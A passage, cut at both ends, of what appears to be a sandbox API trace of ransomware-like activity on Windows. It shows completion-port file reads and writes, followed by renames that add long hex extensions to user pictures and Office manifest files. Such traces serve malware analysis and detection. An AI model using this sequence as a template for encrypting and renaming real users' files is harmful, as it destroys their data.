CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.605] ReadFile (in: hFile=0x600, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0171.605] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.646] WriteFile (in: hFile=0x5fc, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0171.826] RtlInterlockedCompareExchange64 () returned 0x1 [0171.826] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.826] WriteFile (in: hFile=0x5d8, lpBuffer=0x752a588*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0171.836] RtlInterlockedCompareExchange64 () returned 0x7 [0171.836] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0172.026] NtQueryObject (in: Handle=0x604, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x76e1100, ReturnLength=0x422f7cc) returned 0x0 [0172.027] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpString2=".DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070" [0172.028] GetProcessHeap () returned 0x270000 [0172.028] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x4333550 [0172.028] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x422f7bc, FileInformation=0x4333550, Length=0x122, FileInformationClass=0xa) returned 0x0 [0172.118] CloseHandle (hObject=0x604) returned 1 [0172.120] GetProcessHeap () returned 0x270000 [0172.121] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0172.121] RtlInterlockedCompareExchange64 () returned 0x6 [0172.121] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff) Thread: id = 109 os_tid = 0xad8 [0142.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.029] ReadFile (in: hFile=0x590, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.031] WriteFile (in: hFile=0x590, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.046] RtlInterlockedCompareExchange64 () returned 0x1 [0156.046] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.059] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0156.060] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" [0156.060] GetProcessHeap () returned 0x270000 [0156.060] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b4) returned 0x42fc2d8 [0156.060] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42fc2d8, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0156.062] CloseHandle (hObject=0x590) returned 1 [0156.071] GetProcessHeap () returned 0x270000 [0156.072] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.079] RtlInterlockedCompareExchange64 () returned 0x1 [0156.079] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.082] ReadFile (in: hFile=0x59c, lpBuffer=0x74e2700, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c25c8 | out: lpBuffer=0x74e2700*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c25c8) returned 1 [0156.083] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.083] WriteFile (in: hFile=0x59c, lpBuffer=0x74e2700*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c25c8 | out: lpBuffer=0x74e2700*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c25c8) returned 1 [0156.084] RtlInterlockedCompareExchange64 () returned 0x0 [0156.084] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.086] NtQueryObject (in: Handle=0x59c, ObjectInformationClass=0x1, ObjectInformation=0x74c2678, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c2678, ReturnLength=0x723f8ec) returned 0x0 [0156.087] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" [0156.087] GetProcessHeap () returned 0x270000 [0156.087] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc4a0 [0156.087] NtSetInformationFile (FileHandle=0x59c, IoStatusBlock=0x723f8dc, FileInformation=0x42fc4a0, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.088] CloseHandle (hObject=0x59c) returned 1 [0156.091] GetProcessHeap () returned 0x270000 [0156.093] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c25c8 | out: hHeap=0x270000) returned 1 [0156.097] RtlInterlockedCompareExchange64 () returned 0x1 [0156.097] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.101] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.101] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.102] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.102] RtlInterlockedCompareExchange64 () returned 0x0 [0156.103] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.103] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.104] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", lpString2=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" [0156.104] GetProcessHeap () returned 0x270000 [0156.104] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x336820 [0156.104] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x336820, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0156.121] CloseHandle (hObject=0x590) returned 1 [0156.125] GetProcessHeap () returned 0x270000 [0156.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.126] RtlInterlockedCompareExchange64 () returned 0x1 [0156.126] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.129] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.129] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.130] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.131] RtlInterlockedCompareExchange64 () returned 0x0 [0156.131] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.132] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.133] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" [0156.133] GetProcessHeap () returned 0x270000 [0156.134] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x4245f00 [0156.134] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x4245f00, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0156.136] CloseHandle (hObject=0x590) returned 1 [0156.141] GetProcessHeap () returned 0x270000 [0156.143] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.143] RtlInterlockedCompareExchange64 () returned 0x1 [0156.143] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.145] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.145] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.146] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.147] RtlInterlockedCompareExchange64 () returned 0x0 [0156.147] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.148] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.149] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", lpString2=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" [0156.149] GetProcessHeap () returned 0x270000 [0156.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19c) returned 0x42460b8 [0156.149] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42460b8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0156.152] CloseHandle (hObject=0x590) returned 1 [0156.155] GetProcessHeap () returned 0x270000 [0156.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.156] RtlInterlockedCompareExchange64 () returned 0x1 [0156.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.160] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.161] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.413] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.414] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.416] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0156.417] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" [0156.417] GetProcessHeap () returned 0x270000 [0156.417] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1bc) returned 0x36c248 [0156.417] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x36c248, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0156.419] CloseHandle (hObject=0x590) returned 1 [0156.420] GetProcessHeap () returned 0x270000 [0156.422] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.424] RtlInterlockedCompareExchange64 () returned 0x1 [0156.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.429] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.429] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.430] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.431] RtlInterlockedCompareExchange64 () returned 0x0 [0156.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.432] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0156.433] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" [0156.433] GetProcessHeap () returned 0x270000 [0156.433] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c8) returned 0x4330138 [0156.433] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x4330138, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0156.436] CloseHandle (hObject=0x590) returned 1 [0156.440] GetProcessHeap () returned 0x270000 [0156.442] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.443] RtlInterlockedCompareExchange64 () returned 0x1 [0156.443] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.447] ReadFile (in: hFile=0x5ac, lpBuffer=0x7600180, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.448] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.449] WriteFile (in: hFile=0x5ac, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.450] RtlInterlockedCompareExchange64 () returned 0x0 [0156.450] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.451] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.452] lstrcatW (in: 